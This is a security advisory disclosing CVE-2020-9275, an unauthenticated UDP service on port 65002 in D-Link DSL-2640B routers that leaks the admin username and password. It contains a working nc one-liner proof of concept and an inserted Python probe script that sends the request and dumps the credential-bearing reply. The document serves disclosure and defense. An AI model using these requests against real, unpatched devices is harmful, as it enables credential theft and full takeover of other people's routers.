Pulse Security Ltd - Security Advisory PSA-2020-001
D-Link DSL-2640B - Remote credentials exfiltration

Advisory Information
--------------------

Published: 2020-03-28
Version: 1.0
Manufacturer: D-Link
Affected Model: DSL-2640B
Hardware version: B2
Firmware version: ver.4.01 (Europe)
Potentially affected:
- DSL-2640B, HW version B3
- DSL-2641B
Discovered by: Cristofaro Mune - Pulse Security Ltd

Vulnerability Details
---------------------

Class: CWE-522: Insufficiently Protected Credentials
Public References: CVE-2020-9275

Platform:
Successfully tested on D-Link DSL-2640B, HW version B2, with the latest available firmware: EU_4.01B. Other models and/or firmware versions may also be affected.

Background Information:
The D-Link DSL-2640B is an ADSL2/2+ router gateway that provides DSL, wireless and wired connectivity to local networks. The product has reached End-of-Life: D-Link no longer provides security patches or upgrades for it.

Summary:
An issue was discovered on D-Link DSL-2640B B2 EU_4.01B devices. A cfm UDP service listening on port 65002 allows remote, unauthenticated exfiltration of administrative credentials.

Details:
The cfm process running on the device performs a large number of tasks related to the router's basic functionality. Among others, cfm listens on UDP port 65002, accepting unauthenticated commands that allow configuration tasks to be performed on the device.

The format of such commands is as follows:

Incoming commands are accepted, processed and responded to without any form of user authentication. The provided mac_address is checked for almost all incoming commands, with cmd_type="\x00\x01" being a notable exception. For cmd_type="\x00\x01", a minimum length of 10 bytes is required; beyond that, only the cmd_type value itself is checked. The values of all other fields, mac_address included, are disregarded and may be arbitrary.
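The following script is an added example and is not Pulse Security's proof-of-concept. It builds the cmd_type="\x00\x01" request exactly as described above (two cmd_type bytes padded with filler to the 10-byte minimum, since the mac_address and remaining fields are ignored for this cmd_type), sends it to UDP/65002 and reports whether the device answers. The layout of the response is not documented in this advisory, so the script only hex-dumps the reply and does not attempt to parse fields out of it; the 2-second timeout, the zero filler and the 4096-byte receive buffer are the author's assumptions.

```python
#!/usr/bin/env python3
"""Probe a device for the unauthenticated cfm UDP/65002 command.

Added example; assumes only what the advisory states: cmd_type 0x0001
occupies the first two bytes, requests must be at least 10 bytes long,
and every other field is disregarded for this cmd_type. The response
format is not documented, so the reply is hex-dumped, never parsed.
"""
import socket
import sys
from typing import Optional

CFM_PORT = 65002          # UDP port the cfm process listens on
CMD_INFO = b"\x00\x01"    # the cmd_type that bypasses the mac_address check
MIN_LEN = 10              # minimum accepted request length for this cmd_type


def build_probe(filler: bytes = b"\x00") -> bytes:
    """Return a cmd_type=0x0001 request padded to the 10-byte minimum.

    mac_address and the other fields are ignored for this cmd_type, so
    any filler byte works (assumption: zeros are used here; the
    advisory's own PoC repeats \\x00\\x01 instead).
    """
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    return CMD_INFO + filler * (MIN_LEN - len(CMD_INFO))


def hexdump(data: bytes, width: int = 16) -> str:
    """Classic offset / hex / ASCII dump, one line per `width` bytes."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:04x}  {hexpart:<{width * 3}} {asc}")
    return "\n".join(lines)


def probe(host: str, timeout: float = 2.0) -> Optional[bytes]:
    """Send one probe and return the raw reply, or None if nothing came back."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_probe(), (host, CFM_PORT))
        try:
            data, _peer = sock.recvfrom(4096)
        except socket.timeout:
            return None
    return data


def main(argv) -> int:
    host = argv[1] if len(argv) > 1 else "192.168.1.1"
    reply = probe(host)
    if reply is None:
        # UDP gives no negative answer: silence may mean filtered, not patched.
        print(f"{host}: no reply on UDP/{CFM_PORT} (not listening, filtered, or not affected)")
        return 1
    print(f"{host}: {len(reply)}-byte reply to an unauthenticated cmd_type 0x0001 request; "
          "treat the device as affected and inspect the dump for credentials")
    print(hexdump(reply))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 probe.py 192.168.1.1` from a host on the LAN. A reply of any length to an unauthenticated request is the finding; a timeout is inconclusive, because a dropped UDP datagram looks identical to a service that is not there.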
By issuing such a command, the device responds with several pieces of information, including:
- Device MAC address
- Admin username
- Admin password
- Local IP address

This information would allow a remote attacker who is able to reach the router's LAN IP address to log into the router management interface and take complete control of the device. The same applies to attackers able to reach the WAN interface IP address, if Remote Management is enabled.

Proof-of-concept:

python -c 'print("\x00\x01"* 5)' | nc -u 192.168.1.1 65002
####MAC_ADDRESS####

The trailing newline that print appends is harmless: the request already meets the 10-byte minimum and all bytes after the cmd_type are ignored.

Exploitability:
The vulnerability is exploitable from any host connected to the LAN or WiFi interface. More generally, it may be exploitable by any attacker able to deliver UDP packets to port 65002 and read the content of the response.

Impacts:
Remote extraction of sensitive information, such as credentials for logging into the management interface. Full device control can be obtained by a remote attacker able to issue UDP requests to the device. Malicious firmware upload or changes to security-sensitive settings (e.g. DNS servers) can then be achieved.

Solutions & Workaround:
Not available.

Additional Information
----------------------

Timeline (dd/mm/yyyy):
05/02/2020: Contacted D-Link
05/02/2020: Provided vulnerability details
05/02/2020: D-Link acknowledged receipt of the report
06/02/2020: D-Link "elevated the issues to R&D for investigation"
07/02/2020: Informed D-Link of planned disclosure at 30 days from initial contact, unless more time was required for a fix
14/02/2020: Requested CVE from the Mitre Root CNA
19/02/2020: Received assigned CVE from Mitre
22/02/2020: Communicated CVE number to D-Link; status update requested from D-Link. No response received
06/03/2020: Vulnerability publicly discussed at Nullcon 2020
28/03/2020: This advisory